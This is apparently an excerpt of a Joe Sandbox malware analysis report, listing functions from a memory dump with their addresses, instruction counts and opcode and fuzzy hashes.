                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 400edc0ae6f4f9b324eec66b216ce6d1ff740aa82756cefcb4f3c7d081cd9cfd
                                                                      • Instruction ID: 5895e8acb01e45c2f0d78605616cb189cbb27fe9830f08cf89239441a4dba76c
                                                                      • Opcode Fuzzy Hash: 400edc0ae6f4f9b324eec66b216ce6d1ff740aa82756cefcb4f3c7d081cd9cfd
                                                                      • Instruction Fuzzy Hash: 3B224075B00712CFDB25EF39E49062B7BB6BBC4349B108A2CC5568B399DB35E885CB50
                                                                      Function 013D0BC0 Relevance: .3, Instructions: 338COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 083f36d633cf941532f2f63755a7f699d72c596cebc075d594eb12693e20f64a
                                                                      • Instruction ID: 74a79ccfcdcccbdce83df7f9b9dafc3dc567fecec053a866bae95a6159503d5d
                                                                      • Opcode Fuzzy Hash: 083f36d633cf941532f2f63755a7f699d72c596cebc075d594eb12693e20f64a
                                                                      • Instruction Fuzzy Hash: 6881B135E003558FDB2A9B74D4187AEBFB2EF88304F14856AE4065B6A4DB35AD85CB40
                                                                      Function 013D1230 Relevance: .1, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 56c71379081f391cb4156be85b63ea6546f64049e1f462b50e93343f95219fdf
                                                                      • Instruction ID: 3a2cd5c5a0ddbcc5d417a1a156fe4ef15db3833c9cd5bc49e1c457602d642d14
                                                                      • Opcode Fuzzy Hash: 56c71379081f391cb4156be85b63ea6546f64049e1f462b50e93343f95219fdf
                                                                      • Instruction Fuzzy Hash: 913108357412108FC759AB38D458A2D7BE2AF8A71636518B9E506CF771DE36DC42CB80
                                                                      Function 013D1240 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ced8159e1a5051fd047da61556912a5eba0cc20ba2c6d9d61d55ac8ddb934562
                                                                      • Instruction ID: d5f447b4e1c37ab7c828a6bbb6d08cd5e4c5c2bae53335d33ecf7882266df699
                                                                      • Opcode Fuzzy Hash: ced8159e1a5051fd047da61556912a5eba0cc20ba2c6d9d61d55ac8ddb934562
                                                                      • Instruction Fuzzy Hash: 4D21D635B412108FC7A9AB38C458A2D7BE2AF8971636114B8E506CF771DE36DC42CB90
                                                                      Function 013D1AE0 Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47c07dbea0182dccc780d82ecd2a5406d75bde9702e92ab63a9e72f3835fc05f
                                                                      • Instruction ID: 71359ea72cd61cff2c8807274ec6ffb48ce99f3e3eb8c949e4db8f5755b1eec7
                                                                      • Opcode Fuzzy Hash: 47c07dbea0182dccc780d82ecd2a5406d75bde9702e92ab63a9e72f3835fc05f
                                                                      • Instruction Fuzzy Hash: F711D034B002149FCB15EBB9A4607EE7BB6AF85204F1044A9D20A9B3A5DE349D07CB94
                                                                      Function 013D1C00 Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5aa29e867b614b2c5436252d47c5744b1db6de076c43246ceb4844ed93b6285a
                                                                      • Instruction ID: 228f5f700369b3040474582887a9ad1435f04cd98fc61b3cbcf97e9d7a03b558
                                                                      • Opcode Fuzzy Hash: 5aa29e867b614b2c5436252d47c5744b1db6de076c43246ceb4844ed93b6285a
                                                                      • Instruction Fuzzy Hash: 3B11C276E003559FCB01DFB8D8808EBBFF1EF8A20071086A6E505DB225E731A906CB90
                                                                      Function 013D1C10 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b13aae528639b17e84c433b2041af755eb87d29d7b677f4e64a1f949936131cb
                                                                      • Instruction ID: 3f201fb50370f3f47a95ee3dc19eef506361c6d76c241417a8eba6b607824690
                                                                      • Opcode Fuzzy Hash: b13aae528639b17e84c433b2041af755eb87d29d7b677f4e64a1f949936131cb
                                                                      • Instruction Fuzzy Hash: EE01B176E00216DFCB40EFB9D8408AFFBF5FF89350710866AE61597224E730A901CB90
                                                                      Function 013D0880 Relevance: .0, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e55c2867474d2426216331458257b37df646f686a969b23c1bd0fea2801105d9
                                                                      • Instruction ID: 309e19f460c39149f3dcb4a341956cd520d0b1e8ab14fb2a0768f2278fb61125
                                                                      • Opcode Fuzzy Hash: e55c2867474d2426216331458257b37df646f686a969b23c1bd0fea2801105d9
                                                                      • Instruction Fuzzy Hash: F7F04961A0E3C56FCB035BB4A8221997FF59D8B201F5854FAD4C4D7563D124492AC7A2
                                                                      Function 013D0F9D Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 68dd24378e44294be348c3e5ca2205762d9f2ea493bc241c5618707b3a98e2c7
                                                                      • Instruction ID: 8b6e43bc28aef4e1365d4cb3931da9b8a356e338294f249b65b35fdd8bda70f0
                                                                      • Opcode Fuzzy Hash: 68dd24378e44294be348c3e5ca2205762d9f2ea493bc241c5618707b3a98e2c7
                                                                      • Instruction Fuzzy Hash: E9F01C75A00305CFEB24DF78D15879D7BB0AB08708F250859D402AB7A0CB749984CB50
                                                                      Function 013D08A8 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1439848046.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_13d0000_boqXv.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 45b0d44f4781ad9417ba39154baa713e6dcd17c33945d9d57be0f1e9a5e48609
                                                                      • Instruction ID: 7826f794c20d2ed438d82fa6be7b369784a4f199d20cb9367844800d5e5b187a
                                                                      • Opcode Fuzzy Hash: 45b0d44f4781ad9417ba39154baa713e6dcd17c33945d9d57be0f1e9a5e48609
                                                                      • Instruction Fuzzy Hash: F9D017B2D0121DAF8B40EFB8A9051DEBBF8EE08250F000566D919E3600F2705A108BE1